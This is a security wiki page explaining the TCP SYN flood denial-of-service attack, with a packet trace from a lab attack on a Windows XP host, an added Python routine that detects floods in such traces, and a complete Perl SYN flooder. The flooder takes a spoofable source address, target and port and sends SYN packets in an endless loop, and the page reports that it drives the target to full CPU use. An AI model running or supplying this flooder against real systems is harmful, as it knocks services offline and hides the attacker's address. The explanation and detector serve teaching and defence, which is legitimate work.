SYN Flood
From MRL Wiki
SYN Flood is a Denial of Service attack that exploits the three-way handshake (SYN -> SYN/ACK -> ACK) used to establish a TCP connection. By sending a large number of SYN packets without ever responding to the SYN/ACK replies coming from the target host, the attacker creates a large number of half-open connections, eventually exhausting the target host's ability to process any new connections.
Hping
Packet Trace
Below is a packet trace of a typical SYN attack. We are sending SYN packets to the netbios port on a Windows XP machine:
0.000000 192.168.1.66 -> 192.168.1.250 TCP 24345 > netbios-ssn [SYN] Seq=0 Len=0
0.000694 192.168.1.66 -> 192.168.1.250 TCP 15869 > netbios-ssn [SYN] Seq=0 Len=0
0.001019 192.168.1.66 -> 192.168.1.250 TCP 32851 > netbios-ssn [SYN] Seq=0 Len=0
0.001337 192.168.1.66 -> 192.168.1.250 TCP 39007 > netbios-ssn [SYN] Seq=0 Len=0
0.001653 192.168.1.66 -> 192.168.1.250 TCP 12675 > netbios-ssn [SYN] Seq=0 Len=0
0.001968 192.168.1.66 -> 192.168.1.250 TCP 18094 > netbios-ssn [SYN] Seq=0 Len=0
0.002287 192.168.1.66 -> 192.168.1.250 TCP 51402 > netbios-ssn [SYN] Seq=0 Len=0
0.002605 192.168.1.66 -> 192.168.1.250 TCP 33243 > netbios-ssn [SYN] Seq=0 Len=0
0.002919 192.168.1.66 -> 192.168.1.250 TCP 42948 > netbios-ssn [SYN] Seq=0 Len=0
...
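A detection-side reading of the trace above, as an added example that is not part of the original wiki page: it parses tshark-style summary lines and flags a listener once too many SYNs sent to it remain unanswered inside a time window. The function name, the window and the threshold are assumptions chosen for illustration; counting is keyed on the destination rather than the source, since the PoC further down takes the source address as an argument.

```python
import re
from collections import defaultdict, deque

# tshark-style summary line, the format of the trace above
LINE = re.compile(
    r"^\s*(?P<ts>\d+\.\d+)\s+(?P<src>\S+)\s+->\s+(?P<dst>\S+)\s+TCP\s+"
    r"(?P<sport>\S+)\s+>\s+(?P<dport>\S+)\s+\[(?P<flags>[A-Z, ]+)\]")

def detect_syn_flood(lines, window=1.0, max_half_open=5):
    """Return one alert (ts, dst, dport, half_open) per listener whose count of
    unanswered SYNs inside `window` seconds exceeds `max_half_open`.
    Both defaults are illustrative assumptions, not tuned values."""
    pending = defaultdict(deque)   # (dst, dport) -> deque of (ts, src, sport)
    alerted, alerts = set(), []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue               # non-TCP or unparsable line
        ts = float(m["ts"])
        flags = {f.strip() for f in m["flags"].split(",")}
        key = (m["dst"], m["dport"])
        q = pending[key]
        if flags == {"SYN"}:
            q.append((ts, m["src"], m["sport"]))
        elif flags == {"ACK"}:
            # Final ACK of the handshake: that connection is no longer half-open
            for item in q:
                if item[1:] == (m["src"], m["sport"]):
                    q.remove(item)
                    break
        while q and ts - q[0][0] > window:
            q.popleft()            # age out SYNs older than the window
        if len(q) > max_half_open and key not in alerted:
            alerted.add(key)
            alerts.append((ts, key[0], key[1], len(q)))
    return alerts

# Sample input: the first six lines of the trace shown on this page
FLOOD = """\
0.000000 192.168.1.66 -> 192.168.1.250 TCP 24345 > netbios-ssn [SYN] Seq=0 Len=0
0.000694 192.168.1.66 -> 192.168.1.250 TCP 15869 > netbios-ssn [SYN] Seq=0 Len=0
0.001019 192.168.1.66 -> 192.168.1.250 TCP 32851 > netbios-ssn [SYN] Seq=0 Len=0
0.001337 192.168.1.66 -> 192.168.1.250 TCP 39007 > netbios-ssn [SYN] Seq=0 Len=0
0.001653 192.168.1.66 -> 192.168.1.250 TCP 12675 > netbios-ssn [SYN] Seq=0 Len=0
0.001968 192.168.1.66 -> 192.168.1.250 TCP 18094 > netbios-ssn [SYN] Seq=0 Len=0
""".splitlines()

if __name__ == "__main__":
    print(detect_syn_flood(FLOOD))
```

Completed handshakes clear their entry when the client's final ACK is seen, so ordinary connection bursts do not accumulate toward the threshold.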
Code
The code below is the simplest possible implementation of a SYN flooder. This PoC causes 100% utilization on Windows XP SP2 with the firewall off.
#!/usr/bin/perl
# Simple POC SYN Flooder
# Requires perl, Net::RawIP module, and root privileges
use Net::RawIP;
if($#ARGV == 2) {
    ($src,$dst,$port) = @ARGV;
    $a = new Net::RawIP;
    while(1) {
        $src_port = rand(65534)+1;
        $a->set({ip => {saddr => $src,daddr => $dst},tcp => {source => $src_port,dest => $port, syn => 1}});
        $a->send;
    }
} else {
    print "./synflooder source_ip destination_ip destination_port\n";
}